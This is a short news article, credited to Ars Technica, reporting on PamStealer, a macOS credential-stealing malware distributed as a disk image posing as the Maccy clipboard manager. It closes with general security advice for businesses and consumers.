New macOS Malware, PamStealer, Evades Detection with Clever Techniques
Researchers discover a new piece of macOS malware, PamStealer, with stealthy, custom-developed credential-stealing code.

Researchers have discovered a never-before-seen piece of macOS malware that combines a series of clever tradecraft to infect Macs with stealthy, custom-developed credential-stealing code. The malware is delivered in two stages. The first is distributed in a disk image that masquerades as Maccy, a clipboard manager for Macs.
It's compiled as AppleScript that is notable for the way it delivers the second stage. The malware is named PamStealer because the Rust-written infostealer uses the Pluggable Authentication Modules interface built into macOS to validate the target's login password before sending it to an attacker-controlled server. The use of both disk image and AppleScript is common in malware for Macs.
More unusual is the way PamStealer combines them to gain stealth. When the AppleScript is double-clicked, it's opened in the macOS Script Editor, where the malicious functionality is buried deep within the file. The malware's creators have implemented a sophisticated evasion technique, making it challenging for security software to detect.
This approach allows PamStealer to operate undetected, posing a significant threat to macOS users. Why this matters: The discovery of PamStealer highlights the evolving threat landscape for macOS users, who are often perceived as a more secure group compared to Windows users. This malware's ability to evade detection using clever tradecraft underscores the need for developers to prioritize robust security measures, such as implementing strict validation and verification processes for user input.
For businesses, this means investing in advanced threat detection systems and providing regular security training for employees. For consumers, it's essential to exercise caution when downloading software, even from seemingly legitimate sources, and to keep their operating system and security software up to date. As the malware community continues to develop more sophisticated threats, the cat-and-mouse game between security researchers and attackers will only intensify, raising questions about the long-term effectiveness of current security measures and the need for innovative solutions to stay ahead of emerging threats.
Source: Ars Technica